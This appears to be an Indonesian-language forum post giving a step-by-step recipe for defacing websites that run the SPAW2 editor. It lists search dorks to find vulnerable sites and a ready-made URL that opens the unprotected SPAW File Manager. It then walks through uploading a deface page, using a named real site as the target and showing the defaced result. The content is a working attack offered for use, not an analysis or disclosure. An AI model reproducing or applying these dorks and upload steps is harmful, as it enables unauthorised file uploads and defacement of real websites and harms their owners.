DORK
inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

jika sudah menemukan targetnya contoh seperti ini :
http://climatechange.jgsee.org/Admin/spaw2/dialogs/

lalu agan ganti spaw2/dialogs/
dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

jadinya kya gini http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

nanti akan muncul SPAW File Manager:

jangan lupa ganti type nya dari image ke File,dan agan tinggal upload file agan..
jika sudah trus di apain…??

trus agan lihat file kamu sudah masuk blom:

lalu bagaimana cara melihat hasil deface kita???
cara nya,agan klick file yg sudah agan upload,nanti akan ada tulisan download file di sebelah kanan,,dan agan klick,,maka hasil file deface agan akan keluar seperti ini..

ni hasilnya http://climatechange.jgsee.org/Admin/spaw2/uploads/files/scancode.html

udah dehh selesai deface nya,,gampang kan ???